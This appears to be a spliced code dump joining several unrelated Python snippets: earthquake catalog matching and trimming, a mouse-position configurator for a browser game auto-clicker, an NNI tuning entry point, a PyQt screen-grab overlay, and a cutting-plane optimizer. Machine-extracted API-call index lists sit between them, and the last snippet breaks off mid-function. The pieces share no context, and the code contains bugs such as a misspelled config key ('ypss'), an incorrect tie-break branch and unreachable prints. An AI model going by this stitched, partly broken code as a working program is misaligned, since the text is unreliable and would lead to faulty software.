def getvals(row):
'''Gathers time, lat, lon, depth, mag, information from row in dataframe.'''
time = row['time']
lat = row['lat']
lon = row['lon']
depth = row['depth']
mag = row['mag']
ep = (lat,lon)
return time,ep,depth,lat,lon,mag
def boundtrim(cat1, cat2):
''' Arguments: cat1 - an earthquake catalog to be compared with cat2
cat2 - an earthquake catalog to be compared to cat1
Returns: cat1, cat2 - trimmed earthquake catalogs that only extend across bounds
where they both exist. Reduces processing time
'''
# Trims two earthquake catalogs to fit over the same region
lonmin1, lonmin2 = cat1['lon'].min(), cat2['lon'].min()
latmin1, latmin2 = cat1['lat'].min(), cat2['lat'].min()
lonmax1, lonmax2 = cat1['lon'].max(), cat2['lon'].max()
latmax1, latmax2 = cat1['lat'].max(), cat2['lat'].max()
minwest = (lonmax1 > 0 and lonmax1 < 180) or (lonmax2 > 0 and lonmax2 < 180)
maxeast = (lonmin1 < 0 and lonmin1 > -180) or (lonmin2 < 0 and lonmin2 > -180)
difference = abs(lonmin1-lonmax1)>180 or abs(lonmin2-lonmax2)>180
if minwest and maxeast and difference:
pass
else:
cat1 = cat1[(cat1.lon >= lonmin2) & (cat1.lon <= lonmax2)]
cat2 = cat2[(cat2.lon >= lonmin1) & (cat2.lon <= lonmax1)]
cat1 = cat1[(cat1.lat >= latmin2) & (cat1.lat <= latmax2)]
cat2 = cat2[(cat2.lat >= latmin1) & (cat2.lat <= latmax1)]
return cat1, cat2
def timetrim(cat1, cat2):
''' Arguments: cat1 - an earthquake catalog to be compared with cat2
cat2 - an earthquake catalog to be compared to cat1
Returns: cat1, cat2 - trimmed earthquake catalogs that only extend across time
frames where they both exist. Reduces processing time
'''
# Trims two earthquake catalogs to fit over the same time range
cat1['time'] = pd.to_datetime(cat1['time'])
cat2['time'] = pd.to_datetime(cat2['time'])
cat1min, cat1max = cat1['time'].min(), cat1['time'].max()
cat2min, cat2max = cat2['time'].min(), cat2['time'].max()
cat1 = cat1[(cat1.time >= cat2min) & (cat1.time <= cat2max)]
cat2 = cat2[(cat2.time >= cat1min) & (cat2.time <= cat1max)]
return cat1, cat2
def earthquake_string(eqo):
''' Puts earthquake information into a string to be written or printed
Arguments: eqo - earthquake object
Returns: eqos - a string of information stored in earthquake object input argument '''
eqos = (str(eqo.lat) + ',' + str(eqo.lon) + ',' + str(eqo.depth) + ','
+ str(eqo.mag) + ',' + str(eqo.time) + ',' + eqo.catalog)
return eqos
def find_closest(eqo, eqm1, eqm2):
'''Determines which of two potential matches in one catalog is closer to an event in another.
Arguments: eqo - earthquake event in first catalog that matches two events in the second
eqm1 - the first event in the second catalog that matches eqo
eqm2 - the second event in the second catalog that matches eqo
Returns: closest - the closest event weighting time first, then distance, then magnitude '''
# Prints information to console to make user aware of more than one match
print ('-------------------------------------- lat %s lon %s depth %s mag %s time \
%s catlog' % (',',',',',',',',','))
print ('There is more than one match for event: %s' % earthquake_string(eqo))
print ('event1: %s' % earthquake_string(eqm1))
print ('event2: %s' % earthquake_string(eqm2))
# Gets distance between either event and the common match eqo
darc1 = geodesic(eqo.coords, eqm1.coords).meters/1000
darc2 = geodesic(eqo.coords, eqm2.coords).meters/1000
dh1 = abs(eqo.depth - eqm1.depth)
dh2 = abs(eqo.depth - eqm2.depth)
dist1 = sqrt(darc1*darc1 + dh1*dh1)
dist2 = sqrt(darc2*darc2 + dh2*dh2)
# Gets magnitude and time differences between each event and the common match
dtime1 = abs(eqo.time - eqm1.time)
dtime2 = abs(eqo.time - eqm2.time)
dmag1 = abs(eqo.mag - eqm1.mag)
dmag2 = abs(eqo.mag - eqm2.mag)
# Finds the closest match to eqo by checking time first, then distance, then magnitude
if dtime1 < dtime2:
closest = eqm1
elif dtime2 < dtime1:
closest = eqm2
elif dtime1 == dtime2 and dist1 < dist2:
closest = eqm1
elif dtime1 == dtime2 and dist2 < dist1:
closest = eqm1
elif dmag1 == dmag2 and dist1 == dist2 and dmag1 < dmag2:
closest = eqm1
elif dmag1 == dmag2 and dist1 == dist2 and dmag2 < dmag1:
closest = eqm2
# If all things are equal, the first event is chosen as a match by default
else:
print ('The two events are equidistant to the match in time, space, and magnitude.\
The second event was therefore determined independent.')
closest = eqm1
return closest
print ('>>>>closest event: %s' % earthquake_string(closest))
return closest
def removematches(dfo, dfm):
'''Eliminates events in dfo (dataframe) that are found in dfm (dataframe) '''
ind = (dfo.time.isin(dfm.time) & dfo.lat.isin(dfm.lat) & dfo.lon.isin(dfm.lon)
& dfo.mag.isin(dfm.mag) & dfo.depth.isin(dfm.depth))
dfo = dfo[~ind]
return dfo
def rid_matches(cat1, cat2, name1, name2):
''' Compares two catalogs, identifies and removes matching events from cat2.
Arguments: cat1 - the first catalog (dataframe), no events are removed from this catalog
cat2 - the second catalog (dataframe), events in this catalog that are close
in space, time, and magnitude to those in cat1 are filtered out
name1 - the name of the first catalog, used for printing/bookeeping purposes
name2 - the name of the second catalog, used for printing/bookeeping purposes
Returns: df - a filtered version of cat2 without events that match those in cat1 '''
# Setting constants that define matching criteria
tdelta = 30
distdelta = 100
magdelta = 0.5
# Ensuring that all times are in datetime object format & trimming catalogs to only extend
# accross the bounds and time constraints of the other
cat1['time'] = pd.to_datetime(cat1['time'])
cat2['time'] = pd.to_datetime(cat2['time'])
cat1c,cat2c = timetrim(cat1, cat2)
cat1c,cat2c = boundtrim(cat1c, cat2c)
# Making dataframe/filename to store matching events for bookeeping
try:
name1w = name1[-10:] #this doesn't make sense, and seems to chop the file name inappropriately - will have to resolve this later.
name2w = name2[-10:]
except:
name1w = name1[:-4]
name2w = name2[:-4]
matches = pd.DataFrame(columns = ['lat','lon','depth','mag','time','catalog'])
count = 0
# Compares each event in cat2 to each event in cat1
for index,row in cat1c.iterrows():
n = 0
# Getting earthquake info from event and storing it in an Earthquake object (cat1)
time1, ep1, depth1, lat1, lon1, mag1 = getvals(row)
eq1 = Earthquake(time1, ep1, depth1, lat1, lon1, mag1, name1w)
for index, r in cat2c.iterrows():
# Getting earthquake info from event and storing it in an Earthquake object (cat1)
time2, ep2, depth2, lat2, lon2, mag2 = getvals(r)
eq2 = Earthquake(time2, ep2, depth2, lat2, lon2, mag2, name2w)
# If events are close in time, space, and magnitude add event from cat2 to match list
if abs(time1-time2) < datetime.timedelta(seconds = tdelta):
if vincenty(ep1,ep2).meters/1000 <= distdelta:
if abs(mag1-mag2) < magdelta:
# If there is already a match for this event, find the closest
# The closest is stored and compared to third, fourth matches etc if they exist
if n >= 1:
match = find_closest(eq1, match, eq2)
n += 1
if n == 0:
match = eq2
n += 1
else:
pass
else:
pass
else:
pass
# Add matching events to match dataframe
if n > 0:
lat1,lon1,depth1,mag1,time1,name1
matches.loc[len(matches)+1] = [lat1, lon1, depth1, mag1, time1, name1w]
matches.loc[len(matches)+1] = [match.lat, match.lon, match.depth, match.mag,
match.time, name2w]
count += 1
# Write matches to matching file
matchfile = name1w + name2w + '-matches.csv'
# Remove matches from cat2
df = removematches(cat2, matches)
# Print general results to console
print ('%i matches were found between the catalogs: %s and %s.' % (count, name1, name2))
if count > 0:
with open(matchfile,'w') as f:
matches.to_csv(f, header=True, index=False, float_format='%0.4f')
print ('The pairs can be found in the file: ** %s **, which has been written added to the current directory.' % (name1w + name2w + '-matches.csv'))
print ('Based on the order of entry, in the instance of duplicate events, the entries in ** %s ** were added to the slab file while the entries in ** %s ** were not added.' % (name1, name2))
# Return filtered catalog to be written to output file
return df
def rectangleIntersectsPolygon(x1,x2,y1,y2):
####################################
#written by <NAME>, 8/4/2016#
####################################
def is_odd(num):
return num & 0x1
#create polygon from input rectangle
rect = Polygon([(x1,y2),(x2,y2),(x2,y1),(x1,y1)])
#read in slab boundaries
slabfile = 'slab_polygons.txt'
filerows = []
with open(slabfile) as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
filerows.append(row)
csvfile.close()
#loop through the slabnames and slabboundaries by row to define each slab polygon
#then verify whether the input rectangle overlaps any of the defined slabs
slabbounds = []
slabname = []
slab = []
for i in range(len(filerows)-1):
lats =[]
lons = []
slabname = filerows[i][0]
slabbounds = filerows[i][1:]
slabbounds.append(slabbounds)
for j in range(1,(len(filerows[i][:]))):
val = float(filerows[i][j])
if is_odd(j):
lons.append(val)
else:
lats.append(val)
poly = list(zip(lons,lats))
if rect.overlaps(poly):
slab.append(slabname)
else:
continue
#if the input rectangle does not overlap with just one slab, let the user know
if len(slab) == 0:
print ('The input boundaries do not overlap any slabs. Please try again.')
elif len(slab) > 1:
response = raw_input('You have selected multiple slabs. Which slab would you like to model?: ' + str(lons) + ' Please enter a string: ')
slab = response
return slab
| [
"pandas.read_csv",
"pandas.datetime.strptime",
"numpy.isfinite",
"datetime.timedelta",
"numpy.arange",
"pandas.to_datetime",
"datetime.datetime",
"matplotlib.path.Path",
"numpy.dot",
"fnmatch.fnmatch",
"numpy.vstack",
"pandas.DataFrame",
"csv.reader",
"numpy.size",
"os.path.isfile",
"n... | [((12234, 12263), 'datetime.datetime', 'datetime.datetime', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (12251, 12263), False, 'import datetime\n'), ((12274, 12300), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (12298, 12300), False, 'import datetime\n'), ((15450, 15469), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (15457, 15469), True, 'import numpy as np\n'), ((17029, 17049), 'numpy.zeros', 'np.zeros', (['[boxes, 4]'], {}), '([boxes, 4])\n', (17037, 17049), True, 'import numpy as np\n'), ((19042, 19061), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (19049, 19061), True, 'import numpy as np\n'), ((19440, 19453), 'matplotlib.path.Path', 'path.Path', (['xy'], {}), '(xy)\n', (19449, 19453), False, 'from matplotlib import path\n'), ((20769, 20788), 'numpy.size', 'np.size', (['slabbounds'], {}), '(slabbounds)\n', (20776, 20788), True, 'import numpy as np\n'), ((23054, 23106), 'pandas.concat', 'pd.concat', (['[deep_data, shallow_data, dfn]'], {'sort': '(True)'}), '([deep_data, shallow_data, dfn], sort=True)\n', (23063, 23106), True, 'import pandas as pd\n'), ((29568, 29645), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'parse_dates': 'ymdhms', 'usecols': 'cols', 'date_parser': 'dparse'}), '(input_file, parse_dates=ymdhms, usecols=cols, date_parser=dparse)\n', (29579, 29645), True, 'import pandas as pd\n'), ((37348, 37376), 'pandas.to_datetime', 'pd.to_datetime', (["cat1['time']"], {}), "(cat1['time'])\n", (37362, 37376), True, 'import pandas as pd\n'), ((37396, 37424), 'pandas.to_datetime', 'pd.to_datetime', (["cat2['time']"], {}), "(cat2['time'])\n", (37410, 37424), True, 'import pandas as pd\n'), ((41804, 41832), 'pandas.to_datetime', 'pd.to_datetime', (["cat1['time']"], {}), "(cat1['time'])\n", (41818, 41832), True, 'import pandas as pd\n'), ((41852, 41880), 'pandas.to_datetime', 'pd.to_datetime', (["cat2['time']"], {}), "(cat2['time'])\n", (41866, 41880), True, 'import pandas as pd\n'), ((42294, 42365), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['lat', 'lon', 'depth', 'mag', 'time', 'catalog']"}), "(columns=['lat', 'lon', 'depth', 'mag', 'time', 'catalog'])\n", (42306, 42365), True, 'import pandas as pd\n'), ((866, 904), 'datetime.strptime', 'datetime.strptime', (['timestring', 'TIMEFMT'], {}), '(timestring, TIMEFMT)\n', (883, 904), False, 'import datetime\n'), ((9305, 9327), 'numpy.isfinite', 'np.isfinite', (["df['lat']"], {}), "(df['lat'])\n", (9316, 9327), True, 'import numpy as np\n'), ((9341, 9363), 'numpy.isfinite', 'np.isfinite', (["df['lon']"], {}), "(df['lon'])\n", (9352, 9363), True, 'import numpy as np\n'), ((9377, 9401), 'numpy.isfinite', 'np.isfinite', (["df['depth']"], {}), "(df['depth'])\n", (9388, 9401), True, 'import numpy as np\n'), ((9415, 9437), 'numpy.isfinite', 'np.isfinite', (["df['unc']"], {}), "(df['unc'])\n", (9426, 9437), True, 'import numpy as np\n'), ((9775, 9802), 'os.path.isfile', 'os.path.isfile', (['output_file'], {}), '(output_file)\n', (9789, 9802), False, 'import os\n'), ((10077, 10101), 'pandas.read_csv', 'pd.read_csv', (['output_file'], {}), '(output_file)\n', (10088, 10101), True, 'import pandas as pd\n'), ((10116, 10147), 'pandas.concat', 'pd.concat', (['[old, df]'], {'sort': '(True)'}), '([old, df], sort=True)\n', (10125, 10147), True, 'import pandas as pd\n'), ((14487, 14521), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (14497, 14521), False, 'import csv\n'), ((19627, 19651), 'numpy.dot', 'np.dot', (['mask[i]', 'data[i]'], {}), '(mask[i], data[i])\n', (19633, 19651), True, 'import numpy as np\n'), ((22414, 22435), 'numpy.isnan', 'np.isnan', (["data['Paz']"], {}), "(data['Paz'])\n", (22422, 22435), True, 'import numpy as np\n'), ((22495, 22519), 'numpy.isfinite', 'np.isfinite', (["data['Paz']"], {}), "(data['Paz'])\n", (22506, 22519), True, 'import numpy as np\n'), ((25820, 25842), 'numpy.isfinite', 'np.isfinite', (["df['mrr']"], {}), "(df['mrr'])\n", (25831, 25842), True, 'import numpy as np\n'), ((28219, 28251), 'pandas.concat', 'pd.concat', (['[dfm, dfn]'], {'sort': '(True)'}), '([dfm, dfn], sort=True)\n', (28228, 28251), True, 'import pandas as pd\n'), ((29433, 29477), 'pandas.datetime.strptime', 'pd.datetime.strptime', (['x', '"""%Y %m %d %H %M %S"""'], {}), "(x, '%Y %m %d %H %M %S')\n", (29453, 29477), True, 'import pandas as pd\n'), ((34188, 34222), 'numpy.arange', 'np.arange', (['llcrnrlon', 'urcrnrlon', '(5)'], {}), '(llcrnrlon, urcrnrlon, 5)\n', (34197, 34222), True, 'import numpy as np\n'), ((34275, 34309), 'numpy.arange', 'np.arange', (['llcrnrlat', 'urcrnrlat', '(5)'], {}), '(llcrnrlat, urcrnrlat, 5)\n', (34284, 34309), True, 'import numpy as np\n'), ((45554, 45588), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (45564, 45588), False, 'import csv\n'), ((4939, 4980), 'pandas.read_csv', 'pd.read_csv', (['input_file'], {'low_memory': '(False)'}), '(input_file, low_memory=False)\n', (4950, 4980), True, 'import pandas as pd\n'), ((5565, 5596), 'numpy.arange', 'np.arange', (['start_ID', 'stop_ID', '(1)'], {}), '(start_ID, stop_ID, 1)\n', (5574, 5596), True, 'import numpy as np\n'), ((7548, 7579), 'numpy.arange', 'np.arange', (['start_ID', 'stop_ID', '(1)'], {}), '(start_ID, stop_ID, 1)\n', (7557, 7579), True, 'import numpy as np\n'), ((11049, 11077), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {}), "(data['time'])\n", (11063, 11077), True, 'import pandas as pd\n'), ((19691, 19727), 'numpy.vstack', 'np.vstack', (['(keepers, points_in_poly)'], {}), '((keepers, points_in_poly))\n', (19700, 19727), True, 'import numpy as np\n'), ((19847, 19870), 'numpy.isnan', 'np.isnan', (['keepers[i][0]'], {}), '(keepers[i][0])\n', (19855, 19870), True, 'import numpy as np\n'), ((39126, 39159), 'geopy.distance.geodesic', 'geodesic', (['eqo.coords', 'eqm1.coords'], {}), '(eqo.coords, eqm1.coords)\n', (39134, 39159), False, 'from geopy.distance import geodesic\n'), ((39184, 39217), 'geopy.distance.geodesic', 'geodesic', (['eqo.coords', 'eqm2.coords'], {}), '(eqo.coords, eqm2.coords)\n', (39192, 39217), False, 'from geopy.distance import geodesic\n'), ((952, 990), 'datetime.strptime', 'datetime.strptime', (['timestring', 'DATEFMT'], {}), '(timestring, DATEFMT)\n', (969, 990), False, 'import datetime\n'), ((43130, 43164), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'tdelta'}), '(seconds=tdelta)\n', (43148, 43164), False, 'import datetime\n'), ((6160, 6192), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['row', '"""*global*"""'], {}), "(row, '*global*')\n", (6175, 6192), False, 'import fnmatch\n'), ((11142, 11198), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {'format': '"""%m-%d-%YT%H:%M:%S"""'}), "(data['time'], format='%m-%d-%YT%H:%M:%S')\n", (11156, 11198), True, 'import pandas as pd\n'), ((1050, 1089), 'datetime.strptime', 'datetime.strptime', (['timestring', 'TIMEFMT2'], {}), '(timestring, TIMEFMT2)\n', (1067, 1089), False, 'import datetime\n'), ((11274, 11333), 'pandas.to_datetime', 'pd.to_datetime', (["data['time']"], {'format': '"""%m-%d-%YT%H:%M:%S.%f"""'}), "(data['time'], format='%m-%d-%YT%H:%M:%S.%f')\n", (11288, 11333), True, 'import pandas as pd\n'), ((11651, 11706), 'pandas.to_datetime', 'pd.to_datetime', (["row['time']"], {'format': '"""%m-%d-%YT%H:%M:%S"""'}), "(row['time'], format='%m-%d-%YT%H:%M:%S')\n", (11665, 11706), True, 'import pandas as pd\n'), ((11817, 11875), 'pandas.to_datetime', 'pd.to_datetime', (["row['time']"], {'format': '"""%m-%d-%YT%H:%M:%S.%f"""'}), "(row['time'], format='%m-%d-%YT%H:%M:%S.%f')\n", (11831, 11875), True, 'import pandas as pd\n')] |
import json
def confirm():
print("")
# custom function
def rowPrint(xrow=-1,yrow=-1,xpos=-1,ypos=-1,width=9,height=9):
rows = [["O"]*width for _ in range(height)]
for list in rows:
if yrow != -1:
list[yrow]="X"
if xrow != -1:
rows[xrow] = ["X"]*width
if ypos != -1:
n=rows[ypos]
if xpos != -1:
n[xpos]="X"
for list in rows:
printable=""
for str in list:
printable+=" "+str
print(printable)
#rowPrint(1,2,7,6)
def saveJson(currentJson):
configFile=open('config.json','w')
configFile.write(json.dumps(currentJson))
configFile.close()
print("Saved settings: ")
print(currentJson)
print("Exiting.")
quit()
def confSpeed():
print("------------------------")
try:
return float(input("What speed should I click at? (Default: 1) "))
except ValueError:
print("You have to put a number greater than zero! Any other characters will not work (!#$&$*@), though you may put fractions (ex: .5, 1.5, 2.3)")
return float(input("What speed should I click at? (Default: 1) "))
def confLoopMax():
print("------------------------")
try:
return int(input("How many times should I scan the screen for planets before refreshing?: (default: 50) "))
except ValueError:
print("You have to put a number greater than zero! Any other characters will not work (!#$&$*@)")
return int(input("How many times should I scan the screen for planets before refreshing?: (default: 50) "))
def confxpos():
import keyboard
from pymouse import PyMouse
m=PyMouse()
print("------------------------")
rowPrint(8,-1,-1,-1)
print("We will now select the X Positions of the planets.")
print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
input("Press enter when ready: ")
xposl=[]
for x in range(9):
print("------------------------")
rowPrint(-1,-1,8,x)
print("Please press W when you have your mouse hovered over this planet.")
keyboard.wait('w')
xposl.append(m.position()[0])
return xposl
def confypos():
import keyboard
from pymouse import PyMouse
m=PyMouse()
print("------------------------")
rowPrint(-1,0,-1,-1)
print("We will now select the Y Positions of the planets.")
print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
input("Press enter when ready: ")
yposl=[]
for y in range(9):
print("------------------------")
rowPrint(-1,-1,y,0)
print("Please press W when you have your mouse hovered over this planet.")
keyboard.wait('w')
yposl.append(m.position()[1])
return yposl
def confRestartXY():
import keyboard
from pymouse import PyMouse
m=PyMouse()
print("------------------------")
print("We will now select the position of the restart button.")
print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
print("For this step, you may have to complete a game of planet popper to correctly position the mouse.")
input("Press enter when ready: ")
print("Please press W when you have your mouse hovered over it.")
keyboard.wait('w')
rxyp=m.position()
return [rxyp[0],rxyp[1]]
def confRefreshXY():
import keyboard
from pymouse import PyMouse
m=PyMouse()
print("------------------------")
print("We will now select the position of the URL bar.")
print("Please have your browser ready")
print("For this step, you will hover your mouse over the URL bar.")
print("This is to refresh the website every X loops to ensure any bugs do not occur.")
input("Press enter when ready: ")
print("Please press W when you have your mouse hovered over it.")
keyboard.wait('w')
rxyp=m.position()
return [rxyp[0],rxyp[1]]
def retry(currentJson):
done=0
while done==0:
print("------------------------")
print("Current Settings:")
print(currentJson)
print("------------------------")
print("To redo configuration, type retry.")
print("To edit the speed, type speed.")
print("To edit the loopmax, type loopmax.")
print("To edit the xpos, type xpos.")
print("To edit the ypos, type ypos.")
print("To edit the RestartXY, type RestartXY.")
print("To edit the RefreshXY, type RefreshXY.")
print("Type Cancel to cancel.")
wrongSetting=str(input("Selection: ")).lower()
if wrongSetting == "speed":
newspeed=confSpeed()
currentJson['speed']=newspeed
elif wrongSetting == "loopmax":
newmax=confLoopMax()
currentJson['loopmax']=newmax
elif wrongSetting == "xpos":
newxposs=confxpos()
currentJson['xpos']=newxposs
elif wrongSetting == "ypos":
newyposs=confypos()
currentJson['ypss']=newyposs
elif wrongSetting == "restartxy":
newrestxy=confRestartXY()
currentJson['restartXY']=newrestxy
elif wrongSetting == "refreshxy":
newrefrxy=confRefreshXY()
currentJson['refreshXY']=newrefrxy
elif wrongSetting=="cancel":
done=1
else:
print("Invalid selection.")
if done != 1:
print("Continue editing? Y/N: ")
continuevar=str(input('')).lower()
if continuevar == "n":
done=1
return currentJson
#could use a switch statement
def checkConfirm(currentJson):
print("------------------------")
print("Current Settings:")
print(currentJson)
print("------------------------")
print("Are these settings correct?")
confirm=str(input("Type Y/Yes or N/No to select: ")).lower()
confirmed=['y','ye','yes']
nconfirmed=['n','no']
status=3
while status == 3:
if confirm in confirmed:
status=1
elif confirm in nconfirmed:
status=2
else:
confirm=str(input("Type Y/Yes or N/No to select: ")).lower()
status=3
if status==1:
print("confirmed")
if status==2:
currentJson=retry(currentJson)
return currentJson
def configure(configFile):
try:
confJson=json.loads(configFile.read())
print("Loaded current config")
#print(confJson)
cmode=-1
except ValueError:
print("Config file not correctly loaded. Creating...")
cmode=0
emptyConfig={"speed" : 0,
"loopmax" : 0,
"xpos" : [],
"ypos" : [],
"restartXY" : [],
"refreshXY" : []}
print("Entering mode %s"%(cmode))
if cmode == 0:
configFile.write(json.dumps(emptyConfig))
confSpeedr=confSpeed()
confLoopMaxrow=confLoopMax()
currentSettings={"speed" : confSpeedr,
"loopmax" : confLoopMaxrow,
"xpos" : confxpos(),
"ypos" : confypos(),
"restartXY" : confRestartXY(),
"refreshXY" : confRefreshXY()}
print("Current settings: %s"%(currentSettings))
print("Is this correct?")
new=checkConfirm(currentSettings)
saveJson(new)
if cmode == -1:
new=retry(confJson)
saveJson(new)
if __name__ == '__main__':
try:
configFile=open('config.json','r+')
configure(configFile)
except IOError:
configFile=open('config.json','w+')
configure(configFile)
| [
"pymouse.PyMouse",
"keyboard.wait",
"json.dumps"
] | [((1645, 1654), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (1652, 1654), False, 'from pymouse import PyMouse\n'), ((2282, 2291), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (2289, 2291), False, 'from pymouse import PyMouse\n'), ((2924, 2933), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (2931, 2933), False, 'from pymouse import PyMouse\n'), ((3378, 3396), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (3391, 3396), False, 'import keyboard\n'), ((3528, 3537), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (3535, 3537), False, 'from pymouse import PyMouse\n'), ((3956, 3974), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (3969, 3974), False, 'import keyboard\n'), ((614, 637), 'json.dumps', 'json.dumps', (['currentJson'], {}), '(currentJson)\n', (624, 637), False, 'import json\n'), ((2133, 2151), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (2146, 2151), False, 'import keyboard\n'), ((2770, 2788), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (2783, 2788), False, 'import keyboard\n'), ((6968, 6991), 'json.dumps', 'json.dumps', (['emptyConfig'], {}), '(emptyConfig)\n', (6978, 6991), False, 'import json\n')] |
import sys
import nni
from sklearn.metrics import r2_score
sys.path.append('../..')
from model_layer.model_hub import GRU
from model_layer.model_tuner import RecurrentModelTuner
from utils import base_io
def main(model_class, future_index, params):
target_metric_func = r2_score
metric_name = 'R_Square'
tune_model = RecurrentModelTuner(model_class=model_class, future_index=future_index,
target_metric_func=target_metric_func, metric_name=metric_name,
params=params)
tune_model.run()
if __name__ == '__main__':
future_index = 'IC'
model_class = GRU
# params = base_io.load_best_params(future_index, model_class.name)
params = nni.get_next_parameter()
main(model_class, future_index, params)
| [
"nni.get_next_parameter",
"sys.path.append",
"model_layer.model_tuner.RecurrentModelTuner"
] | [((66, 90), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (81, 90), False, 'import sys\n'), ((347, 506), 'model_layer.model_tuner.RecurrentModelTuner', 'RecurrentModelTuner', ([], {'model_class': 'model_class', 'future_index': 'future_index', 'target_metric_func': 'target_metric_func', 'metric_name': 'metric_name', 'params': 'params'}), '(model_class=model_class, future_index=future_index,\n target_metric_func=target_metric_func, metric_name=metric_name, params=\n params)\n', (366, 506), False, 'from model_layer.model_tuner import RecurrentModelTuner\n'), ((763, 787), 'nni.get_next_parameter', 'nni.get_next_parameter', ([], {}), '()\n', (785, 787), False, 'import nni\n')] |
import sys
from PyQt4 import QtGui, QtCore
class TopWindow(QtGui.QMainWindow):
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.setWindowFlags(
QtCore.Qt.WindowStaysOnTopHint |
QtCore.Qt.FramelessWindowHint |
QtCore.Qt.X11BypassWindowManagerHint
)
self.setGeometry(QtGui.QStyle.alignedRect(
QtCore.Qt.LeftToRight, QtCore.Qt.AlignRight,
QtCore.QSize(340, 768),
QtGui.qApp.desktop().screenGeometry()))
self.label = QtGui.QLabel(self)
self.label.resize(self.size())
self.redraw()
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.redraw)
self.timer.start(30)
def redraw(self):
pixmap = QtGui.QPixmap.grabWindow(QtGui.QApplication.desktop().winId())
self.label.setPixmap(pixmap.copy(340, 0, 340, 768))
def mousePressEvent(self, event):
QtGui.qApp.quit()
app = QtGui.QApplication(sys.argv)
topWindow = TopWindow()
topWindow.show()
app.exec_()
| [
"PyQt4.QtGui.QApplication",
"PyQt4.QtGui.qApp.desktop",
"PyQt4.QtGui.QApplication.desktop",
"PyQt4.QtCore.QTimer",
"PyQt4.QtGui.QLabel",
"PyQt4.QtGui.qApp.quit",
"PyQt4.QtGui.QMainWindow.__init__",
"PyQt4.QtCore.QSize"
] | [((982, 1010), 'PyQt4.QtGui.QApplication', 'QtGui.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (1000, 1010), False, 'from PyQt4 import QtGui, QtCore\n'), ((112, 144), 'PyQt4.QtGui.QMainWindow.__init__', 'QtGui.QMainWindow.__init__', (['self'], {}), '(self)\n', (138, 144), False, 'from PyQt4 import QtGui, QtCore\n'), ((544, 562), 'PyQt4.QtGui.QLabel', 'QtGui.QLabel', (['self'], {}), '(self)\n', (556, 562), False, 'from PyQt4 import QtGui, QtCore\n'), ((646, 661), 'PyQt4.QtCore.QTimer', 'QtCore.QTimer', ([], {}), '()\n', (659, 661), False, 'from PyQt4 import QtGui, QtCore\n'), ((957, 974), 'PyQt4.QtGui.qApp.quit', 'QtGui.qApp.quit', ([], {}), '()\n', (972, 974), False, 'from PyQt4 import QtGui, QtCore\n'), ((446, 468), 'PyQt4.QtCore.QSize', 'QtCore.QSize', (['(340)', '(768)'], {}), '(340, 768)\n', (458, 468), False, 'from PyQt4 import QtGui, QtCore\n'), ((804, 832), 'PyQt4.QtGui.QApplication.desktop', 'QtGui.QApplication.desktop', ([], {}), '()\n', (830, 832), False, 'from PyQt4 import QtGui, QtCore\n'), ((482, 502), 'PyQt4.QtGui.qApp.desktop', 'QtGui.qApp.desktop', ([], {}), '()\n', (500, 502), False, 'from PyQt4 import QtGui, QtCore\n')] |
import numpy as np
import matplotlib.pyplot as plt
import math
from scipy.optimize import linprog
from cvxpy import *
class CuttingPlaneModel:
def __init__(self, dim, bounds):
self.dim = dim
self.bounds = bounds
self.coefficients = np.empty((0,dim+1))
def __call__(self, x):#REMOVE
y = [np.sum(np.multiply(coefficients_i, np.hstack((1,x)))) for coefficients_i in self.coefficients]
return np.max(y), 0
def get_constraints(self):
A_ub_x = np.asarray([[c[1],c[2]] for c in self.coefficients])
A_ub_y = np.asarray([-1 for i in range(self.coefficients.shape[0])])
b_ub = np.asarray([-c[0] for c in self.coefficients])
return A_ub_x, A_ub_y, b_ub
def add_plane(self, f, g, x):
c = f - np.sum(np.multiply(g,x))
new_plane = np.append(c,g)
self.coefficients = np.append(self.coefficients, [new_plane], axis=0)
def solve(self, lb, ub):
A_ub_x, A_ub_y, b_ub = self.get_constraints()
x = Variable(self.dim)
y = Variable() #TODO: yp yn se non funziona per min negativo
constraints = []
constraints.append(A_ub_x @ x + A_ub_y * y <= b_ub)
objective = Minimize(y)
problem = Problem(objective, constraints)
problem.solve(verbose=False)
#print("Problem status: ", problem.status)
on_border = problem.status in ['unbounded', 'infeasible']# TODO infeasible fix se possibile
if problem.status == 'infeasible':
print("Warning: Infeasible problem")
if on_border:
lb_constraint = [lb]*self.dim # Rewrite as two variables
ub_contraint = [ub]*self.dim
constraints.append(lb_constraint <= x)
constraints.append(x <= ub_contraint)
problem = Problem(objective, constraints)
problem.solve(verbose=False)
#print("Problem status: ", problem.status)
#print("MODEL min: ", x.value, y.value)
return x.value, y.value, on_border
def project_point(self, x0, level, max_distance_error=1e-2, verbose=False):
n = len(x0)
P = np.eye(n)
q = np.multiply(x0, -2)
x = cvxpy.Variable(n)
y = cvxpy.Variable()
